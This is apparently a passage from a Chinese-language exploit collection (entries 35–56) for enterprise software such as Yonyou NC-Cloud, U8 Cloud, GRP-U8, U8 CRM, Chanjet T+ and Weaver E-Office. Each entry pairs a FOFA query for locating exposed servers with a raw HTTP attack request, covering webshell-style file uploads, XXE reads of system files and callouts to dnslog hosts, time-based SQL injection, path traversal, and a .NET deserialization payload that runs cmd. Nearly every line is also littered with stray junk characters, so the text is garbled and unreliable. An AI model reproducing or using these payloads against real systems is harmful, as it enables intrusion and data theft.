, u: `7 _. I; r/ @7 e6 r3 G# P, ?" T# h* j/ |, n
' T2 E5 k: Q' r9 h* [/ R35. 用友NC-Cloud importhttpscer任意文件上传2 R7 v: L6 `; t5 ~3 d
FOFA:app="用友-NC-Cloud"& i7 f. B9 @5 N$ D- Y
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1, d/ }9 A5 P0 t! e5 x9 l
Host: 203.25.218.166:8888 b/ G# u4 B. l2 @- a; z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+ ^" T% P V; Z. k5 L* `Accept-Encoding: gzip, deflate
, Y* V/ n- q1 n. RAccept: */*; w/ ] O0 N9 R, Y5 h# N& a+ A2 u
Connection: close l W' c- g% w4 I
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
" Z% s; y# p1 D1 X) y! iContent-Length: 190
5 a5 S+ V6 ^: {6 P" C6 cContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df02 B- K: h D; i9 i1 O' K9 j% P, Z
+ f& p6 F1 C- T9 P
--fd28cb44e829ed1c197ec3bc71748df03 j- {8 k1 a- U% Z( O0 O5 v
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"+ y/ R0 S8 W3 v% V5 f2 f2 K7 A z
/ `, a0 T( Q8 I- W7 H, _% F9 k
<%out.println(1111*1111);%>
! h' }# e" [& a. d+ k" O6 t6 k5 O4 h; L* d--fd28cb44e829ed1c197ec3bc71748df0--1 F# E" f% F7 A5 h6 w
2 f0 p: U1 O( [. w4 [. C8 F. w2 p1 Q$ w3 X0 @: r3 f! j& x
36. 用友NC-Cloud soapFormat XXE
! J! B2 K9 f" U D$ U# h" ?FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"' L5 @) ?" |9 D3 o3 g' V
POST /uapws/soapFormat.ajax HTTP/1.1) s* Q& G- J* ~7 C
Host: 192.168.40.130:8989( \1 H7 j! C" J( J( |& _% k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0. l5 L9 x8 B% q; I' a# \( |
Content-Length: 263
6 m' U3 \4 g9 E8 @3 m* @1 _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 x* p! E7 V2 a H0 {Accept-Encoding: gzip, deflate2 s3 D5 z2 j4 I* T9 w/ ^2 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 K5 D! {5 L! M& v) eConnection: close8 ~) k& ?8 @ U2 m! n; f
Content-Type: application/x-www-form-urlencoded1 x* q4 ]' @7 ~! s+ ^- E0 s4 e. x
Upgrade-Insecure-Requests: 11 [, K( _2 o! h0 s+ Y
1 \# U9 q8 J# R* C% Bmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a9 w0 ^$ Z) _( Z
+ f# n! F9 k( W- t/ P- D$ A! k- T6 Q: f3 h9 U7 y8 x
37. 用友NC-Cloud IUpdateService XXE- C+ d' O/ j) S4 d0 x! J# n1 p. a4 k6 ]
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( i. w; X* j* h' B$ k" X
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 k) O3 r9 V1 N: b* k6 ~6 i) u
Host: 192.168.40.130:8989
~, E) _- V- S; FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36- X6 r% I9 @& I0 g6 c
Content-Length: 4210 d6 E" I$ A6 e$ e1 {. p: ?- N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# |5 y1 o8 V7 m9 X- r f$ O% N
Accept-Encoding: gzip, deflate
- @0 Y+ \7 U% @$ @Accept-Language: zh-CN,zh;q=0.9# E3 F+ b% A" u+ `5 U$ D# a
Connection: close
$ J$ ?3 D) a, T/ T. ?( D" QContent-Type: text/xml;charset=UTF-84 ]' s# ~& ^( @7 E% U2 B
SOAPAction: urn:getResult
" `( L" H1 { f! Z1 t# SUpgrade-Insecure-Requests: 1/ \3 L7 {: v6 P7 {& L9 G
8 W: v$ x+ M7 D4 y
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">% e! f4 G- N+ U0 K3 L: O! p" |& |
<soapenv:Header/>9 F9 b, K1 o2 f9 R+ S" I! z4 F
<soapenv:Body>
# p( ]/ ]: V# p, L% d<iup:getResult>7 E. T3 j# i; w; h# S* ?* c
<!--type: string--># q/ Y8 k3 \. q R6 }
<iup:string><![CDATA[0 `& g% p: ]( i0 | a
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
3 m9 k; ]/ y9 g. @5 K! @) U<xxx/>]]></iup:string>
% x" M5 c1 b" Q+ C6 C3 O: v</iup:getResult>7 F, Z1 k3 ?6 I) a+ P; D2 m) f
</soapenv:Body>
1 H/ X0 u$ V% F- n9 u</soapenv:Envelope>
0 }. f% k. f- d# x- _- J0 j; j* z# o& A U9 z8 Z' [
$ B- a* E/ W3 Y1 {% V( n5 W# K0 o
38. 用友U8 Cloud smartweb2.RPC.d XXE
# |. U& Z) c# JFOFA:app="用友-U8-Cloud"4 ^6 s7 W4 O0 O6 t- G
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.14 L- o* F) z. y: H. u2 v0 K
Host: 192.168.40.131:8088
* d/ J% C8 C+ p( dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* I; f' g* b& {; o3 k. b
Content-Length: 260
& l# R! F( {: l8 F; TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
/ N) |9 G5 f& H; H6 FAccept-Encoding: gzip, deflate& o4 Y( |: F( B! q
Accept-Language: zh-CN,zh;q=0.93 ?) n- ?& R1 F8 [1 o3 U
Connection: close. P V, c2 ?1 D( M
Content-Type: application/x-www-form-urlencoded6 O# E- Q/ V5 b; a2 `8 S
! ]/ B& h% ^* t) J; \ H" C
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>; {6 J; W9 K# j# w8 \% R0 P
+ ?* ]3 n* }/ [
: y( u. N6 V3 ?: Y+ S* U4 K39. 用友U8 Cloud RegisterServlet SQL注入3 L* r! \! m* i: X1 ]
FOFA:title="u8c"+ S) k+ m+ I" s6 d0 A
POST /servlet/RegisterServlet HTTP/1.1
. l7 I3 _" r- K1 xHost: 192.168.86.128:8089
1 ]7 ~% v2 q# EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% _0 e4 N* J# r" h" m2 L
Connection: close
. w, C( K1 a7 n0 iContent-Length: 85
# x6 V1 @' F. G9 t6 JAccept: */*
$ }2 x! v% V6 S9 q/ a- R7 `Accept-Language: en& B! p/ z5 ] q( U j; D
Content-Type: application/x-www-form-urlencoded% j+ O$ S4 X2 B9 `9 f) c: j
X-Forwarded-For: 127.0.0.1
. s* R' W: G5 J: ^1 |7 |Accept-Encoding: gzip
2 |$ R3 B% f/ m, q K# X* K; O
2 U" n- o) _1 [' qusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
- a+ Y& v; A$ m* `6 F
5 A$ J! i7 X" C0 k' o* t- \/ O# T2 g& s1 g& l
40. 用友U8-Cloud XChangeServlet XXE
0 H" [& r/ E; rFOFA:app="用友-U8-Cloud"5 Y: P) u2 M' e7 C1 f6 R# `
POST /service/XChangeServlet HTTP/1.1
4 \$ V, P4 d H/ G c4 iHost: x.x.x.x
7 w6 [4 w; o, O }" ?' q8 GUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
% L# ^0 s# R5 j6 y& ^* LContent-Type: text/xml
9 X1 z# Q+ p. T9 y2 LConnection: close5 z; G. Q3 H; ^9 K
* Z) [$ U/ Z* |' t, E$ b3 @2 C<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
+ G: B1 Z7 _: S7 \) ]
; a3 `: |) k8 v- O8 {# Q) O! M' ?, ]1 Q, P8 t8 f; p
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
/ Y) P8 w' i0 E7 RFOFA:app="用友-U8-Cloud"
1 i( }. y6 X# v6 @GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1) N/ J" Y0 n, f0 A \& r2 F+ @
Host:9 }5 u T9 m/ Z/ v8 _6 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! Y/ z- C' L" ]9 XContent-Type: application/json
' u+ `' [0 c3 n3 c) Y2 ^9 oAccept-Encoding: gzip; S1 l* W3 U, @5 C; z4 V
Connection: close* Z0 l- B" C" Q
% _# f: R8 R% E: ?& _7 M! ~$ w0 U6 s5 v7 e- \9 a/ H0 \! L
42. 用友GRP-U8 SmartUpload01 文件上传
" X" d' W' r( x: Q7 gFOFA:app="用友-GRP-U8"
& X- h# m# @2 CPOST /u8qx/SmartUpload01.jsp HTTP/1.1
6 ?4 [; N; M2 B% q; N& PHost: x.x.x.x
$ l( E+ K) T1 h# p# q7 ?! _" s7 jContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
5 c+ O2 U% K/ F( Y- mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
2 ]- r- I. m4 D: C& y: L& O8 u: L' S# O1 D/ X8 ?% g
PAYLOAD
% @8 G, h8 C) v4 q1 W
+ G/ w7 @' g; q+ I) _' M
7 V2 j' k$ n" G- W# {3 h4 p0 z" dhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml& v+ E- z2 W1 N: ?8 u6 V% V8 k/ v
' Z) y" `; F- X) @8 A/ `
43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 Z# i B; z! T0 l& K4 O
FOFA:app="用友-GRP-U8"
; |4 }8 ?$ H3 K1 s. f% p* a/ DPOST /services/userInfoWeb HTTP/1.17 B/ ]/ N9 B+ y# g
Host: your-ip' d8 l7 A" A, T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 f/ B$ e) I* i4 y% G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ J$ b6 }: q! W$ ?0 C" S }( L
Accept-Encoding: gzip, deflate8 w5 b4 W0 L" k0 W" E
Accept-Language: zh-CN,zh;q=0.9
: G8 }% o5 J" m# @! gConnection: close
4 |& c" |) x* O; R4 M* F- xSOAPAction:/ j8 D' D" L* G% s& N4 R* X
Content-Type: text/xml;charset=UTF-8
5 {/ k" e- m1 W
( Y( W( v" U6 ^) j: ~<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">/ O% _& {0 g+ C3 t
<soapenv:Header/>
7 i' b5 j) f) o1 j* f- L <soapenv:Body>
. U+ E8 V1 k! `8 W! y <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
7 \8 U+ ~: L' }+ @ ?, r <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>) C1 r" A5 a3 d# @7 x
</ser:getUserNameById>
+ G; m% A9 z& Z. Q1 v </soapenv:Body>
' ^ S6 J1 ^8 w5 l</soapenv:Envelope>, R$ X* E% u! I/ r3 Y/ d
9 B3 f" X4 P7 G) K
8 r- V3 X7 q g$ u44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: I8 p- L2 a- ?% ^! s) AFOFA:app="用友-GRP-U8") K( w1 x @$ G% D$ r2 q
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.18 b$ H& R; C& ]& G- Z7 |5 k
Host: your-ip
3 P0 F% i. P' |& k& {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ B) p8 g* D8 T# J" eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 }6 C9 q) f/ G" E+ ?& ~
Accept-Encoding: gzip, deflate2 Z* B0 c! f2 P' m0 u1 O
Accept-Language: zh-CN,zh;q=0.9; L5 u/ C& C& d9 d' x* c# h
Connection: close
, g. H& } g% p5 P3 B& K$ x" @- Q: \; X+ v5 D& }) D9 V! N9 E
$ L, C" U& x. j- t' ?45. 用友GRP-U8 ufgovbank XXE
( ^" v% |4 K# o1 G v' C) j, bFOFA:app="用友-GRP-U8"
0 q3 f# f, F3 P6 v5 c* J* QPOST /ufgovbank HTTP/1.10 j3 B X8 _3 H* j. M
Host: 192.168.40.130:222
9 T% n2 u' ]! nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
' Y, g/ i" r/ l: b5 u9 wConnection: close
) ]6 ]9 D# Y4 x* r( N& qContent-Length: 161% U) z& S5 S* _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. ]% ~; q* g0 L/ m" T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) v; ?% U' b5 h. h1 x
Content-Type: application/x-www-form-urlencoded0 b. i5 _5 y* m( Y/ R: j
Accept-Encoding: gzip; }# g- ?/ @, A. q% X( i: s9 J! Y
5 b0 K& J% e, h, r" ZreqData=<?xml version="1.0"?>6 }6 e7 {" G( y; `8 u0 z
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest$ u3 ]9 {6 N8 ~& r0 W
. \% I! ~3 C2 l6 T4 w4 ]2 ?! Q
I) {# S' I: }) i
46. 用友GRP-U8 sqcxIndex.jsp SQL注入. H' O* |' G/ y
FOFA:app="用友-GRP-U8"9 u3 M; e8 l) i! w) f9 W- p
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1. O2 N7 \9 W& S8 w* l
Host: your-ip9 E; j5 K& S, [9 g. E. ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
' u/ W- N! O. [3 w5 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 c/ f6 D% E. x
Accept-Encoding: gzip, deflate" K$ b0 G. Y6 m
Accept-Language: zh-CN,zh;q=0.9
' @: H' P2 k9 W3 }5 A" M# n! LConnection: close
' V/ Z5 w; M8 \7 o v/ O$ X9 q+ ^
" B* ], ^, w( n( T Y
47. 用友GRP A++Cloud 政府财务云 任意文件读取" Z/ g8 B9 u# S
FOFA:body="/pf/portal/login/css/fonts/style.css"
! Y! h1 K7 _0 q3 N+ f/ A! U9 VGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1% P# M- c, t& r. o! M
Host: x.x.x.x! i4 {3 }. y, v9 E; E4 T; i
Cache-Control: max-age=0
- E2 B* I9 z- IUpgrade-Insecure-Requests: 1
5 v! F/ C* Q, E/ e1 S- gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 t5 [) y) B- P4 e0 b- V! x+ R5 |8 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 x4 K7 v2 P% u5 c/ I9 E P; z
Accept-Encoding: gzip, deflate, br
4 y/ q5 S3 f3 a, J/ XAccept-Language: zh-CN,zh;q=0.91 i( S. j/ w6 C3 x
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT; \* c% t0 W% a" g
Connection: close
a" H7 w d# P# V! f1 _1 _; p
3 M% r' A% ~- _! t! ^9 L: _
; N* s# M1 u0 J
& B$ C c; Y0 }! I( `. R; p48. 用友U8 CRM swfupload 任意文件上传
- r2 }. b7 T) ^" tFOFA:title="用友U8CRM", w" N$ d7 E9 U6 v
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ q' _7 R! r; f$ S! e" O- n
Host: your-ip. w* g1 [8 B. R# b% [; X. e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 t% a, S/ w8 L% }3 }# @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 F0 o2 c+ | h) `. N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" ^' { r# u6 {8 H6 p2 T8 q, {3 _0 kAccept-Encoding: gzip, deflate, q" ?& I' o. O6 T4 ?# {* i
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855! w, W( Y9 g4 L' r% r! t! b
------269520967239406871642430066855. x; ?8 r4 f' b4 {9 `: M5 m0 s! C( C
Content-Disposition: form-data; name="file"; filename="s.php"
0 d+ L8 S: J R4 r4 N9 q. q6 k1231
% {! S2 U1 p. L: k- f8 IContent-Type: application/octet-stream
i7 H, e4 J" s4 }, A------2695209672394068716424300668558 ^& D9 d# ]% i6 f$ \) k
Content-Disposition: form-data; name="upload"
4 @5 ]) k( m Lupload
7 x+ |! Q3 X. z------269520967239406871642430066855--
% t: f) q0 e* D9 R) _- J" D. w
c. V$ X4 T) d! i7 K; C5 y- A9 M7 ]+ g9 {5 Q# F/ g% W; b. g
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 X9 v l8 m8 O1 tFOFA:body="用友U8CRM"
5 ^8 Q" h ?( Q/ f* b- g& C" V8 p4 A: z) {+ o- ?
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
+ R* [+ l) a, [4 [Host: x.x.x.x
9 \8 O: k0 @, K3 S& S" @( C. X# s9 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% P* P' Q; g9 u: j$ gContent-Length: 329
0 F' q! n) ^6 v' v( iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ w# O& y' J* D$ ?1 y: _. G4 H) iAccept-Encoding: gzip, deflate
4 ^$ B/ W' c m% F& d+ @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& ?0 A. w5 n) Y/ Z
Connection: close v, W* J2 L" m$ Z6 R
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
( w# t' m/ Q0 ?8 p9 n; z$ h
6 k. ?% i$ x q: L/ F-----------------------------vvv3wdayqv3yppdxvn3w( ?6 Q3 k% I# a0 z( G
Content-Disposition: form-data; name="file"; filename="%s.php "" c+ e2 s: [ D& E
Content-Type: application/octet-stream/ E. H" c# E* k+ b3 a, u
- Q6 f* J) f0 Y6 Q, R/ \
wersqqmlumloqa
, f# z9 A" c$ _/ [2 _7 {-----------------------------vvv3wdayqv3yppdxvn3w
7 M( x" x7 }" ?# o7 aContent-Disposition: form-data; name="upload"6 C4 \4 P1 j1 |( H* b) `# ~
& l5 M2 A2 K* D9 y# ]upload
% L/ ]( E1 p! l$ W9 y# s" Q-----------------------------vvv3wdayqv3yppdxvn3w--* ? w1 G' ]/ q/ ]$ d7 U
; G& S/ K. D' h$ q8 _% t& ]
0 H" c3 D# X( Z: A" ~) X( H
http://x.x.x.x/tmpfile/updB3CB.tmp.php
2 h3 v3 k2 k% }- q) ~8 H! `1 q! p) B: T/ }
50. QDocs Smart School 6.4.1 filterRecords SQL注入
* l+ h4 H q7 y }6 _8 rFOFA:body="close closebtnmodal"
0 d7 j5 M. C. @& F7 T$ cPOST /course/filterRecords/ HTTP/1.1( q s2 ~& f+ k0 I/ d' g$ i6 k
Host: x.x.x.x
8 m6 y% V0 ~" |2 ~* |User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.367 B1 I$ {" D/ i% G# G0 H
Connection: close+ I2 b7 p" `+ d: X' J m0 X
Content-Length: 224
6 F7 E9 n0 \$ ~Accept: */*& i) O7 I! X: D
Accept-Language: en
Y3 b& @% y( X* n" B( ]* ~% NContent-Type: application/x-www-form-urlencoded
t( J( w2 K! J4 n4 x, pAccept-Encoding: gzip; H P$ a* @+ P1 N
5 s6 r7 d, w4 F7 [3 S9 T4 x
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
( ^7 a/ R% R* @( t8 M. L! V9 J
. ?0 t& G5 b9 y
; c/ K' T% c( S# }# [, l' \51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入0 b$ ~3 d8 [0 v8 x/ c
FOFA:app="云时空社会化商业ERP系统"
% d) J. Z" Y; A, zGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. m1 e' z) @: p. n& ^' L) vHost: your-ip8 l' t# @7 v( I$ @8 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
8 ]( X! v, |9 G( t) y2 }% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 ~" z" F0 w( u( p6 P, K* zAccept-Encoding: gzip, deflate
: Z5 Z! Y0 l7 \" @% rAccept-Language: zh-CN,zh;q=0.9 C" K$ E9 b0 W; I( T: @
Connection: close0 q# i( u5 v7 C8 \3 B. H( n; \( x
! \7 O, R4 F8 A& d2 q2 j3 q0 M- j
6 x+ S- J7 C9 d8 E$ }52. 泛微E-Office json_common.php sql注入
5 X! V3 ~0 R( {; K. ?, S) |7 l9 f) fFOFA:app="泛微-EOffice"
2 D+ N& I4 o# \2 X9 c; YPOST /building/json_common.php HTTP/1.19 D0 M! A! c( d) [, C( p4 W
Host: 192.168.86.128:80970 V6 `: q+ v8 u0 B6 I: i1 f6 B( ~1 b
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( @: l6 \- a7 n% p/ K- X! A
Connection: close
4 Q8 m K2 r6 b: x1 b3 O0 y4 HContent-Length: 87( g7 ]. i) E; u. r9 n. i
Accept: */*
9 ?2 M6 Q( V' V! pAccept-Language: en2 s1 m4 D! L$ k; _* g( V1 Y
Content-Type: application/x-www-form-urlencoded
$ j$ }8 z7 z% Q/ T! [5 uAccept-Encoding: gzip
; R5 Z1 |3 J# ]
% f" P" D1 p7 V/ F9 I! rtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 |0 r. T6 O/ t0 Q |' @
+ ]* P! o( N, A0 H3 ?" V5 ^) [1 |8 v' J1 s0 ~& h
53. 迪普 DPTech VPN Service 任意文件上传! [ J2 a6 L( O& q6 \" ]+ O% a2 U/ p
FOFA:app="DPtech-SSLVPN"
( A2 L( B0 T0 K9 t: ]2 U, G/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd6 V- L* o& z' c. g- z/ V4 m
0 j0 N) K, A/ ^8 [4 W
1 I! m. V0 P* ? O, c+ h# D54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# v+ D% v/ i2 M% d8 f, hFOFA:app="畅捷通-TPlus"
0 J+ @9 n6 k, x0 A, i第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件4 G6 G# S. C/ \5 a3 d
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"- }) H; e% ]2 c E4 }6 k* \! ^
: ]! j+ {$ t; m2 h/ ^/ c
- m6 r& v; {! V7 d' f @9 p
完整数据包* O3 _4 a/ a- H9 F, s, v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.12 L0 S+ G' w, F% l! \2 U- \4 z# s: A
Host: x.x.x.x
8 |- i# s$ @) _$ A4 I0 F, g" ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F) \% J4 K& _3 E C$ R |4 ^2 j
Content-Length: 593
% G$ f P# n, _- p |* W+ T
5 q+ M) O- I2 m/ B2 i+ D3 j- }{
2 w7 z1 E* \$ x- J+ o7 U"storeID":{
& _3 F O y" J8 M9 J "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"," _2 D5 L2 @& u t5 D( ^6 Z
"MethodName":"Start",
* l; f, S! |: j/ p "ObjectInstance":{
; d1 w7 |5 a' c% R; n "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 _' e& L, {% U& f5 S5 o+ k/ f "StartInfo":{
# M1 m a) R. S4 q Q4 ]5 w5 j% s "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
]0 U" r+ i+ D3 m "FileName":"cmd",& w' i% i g+ r r6 \, x
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"/ r$ b, b: b- P
}: J3 {2 T# t v& W% ]: t3 i
}
* g/ ]5 W' U n) B" e: p- g }0 Y" E, e0 S4 u- {" P
}
7 h6 C4 s, N9 r: P1 t4 x: O0 ?6 V8 b4 t0 p: X
' { K3 v5 [7 g0 v# y5 r. O第二步,访问如下url, m8 p2 A0 R) }
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
; }3 m k# L. H) }" v# G& w- f0 K5 M4 r- f9 s# h9 u6 S* i
7 k! D9 O# ~" x% V' X. g
55. 畅捷通T+ getdecallusers信息泄露
4 Y& o* c* }% CFOFA:app="畅捷通-TPlus"' q) |4 V4 O2 Y1 U$ p
第一步,通过
; i1 G2 f0 t( E. \. \- D/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
; N( s4 `2 H3 y9 s1 L第二步,利用获取到的Cookie请求
7 O. E8 K* c" G5 A& O7 w& Y/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers/ s- \2 F5 p6 A5 m4 t, }
- z Y* f# D; S
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
: ^9 L6 a4 m( \FOFA: app="畅捷通-TPlus"0 G$ G D- j% D. V0 h/ p f
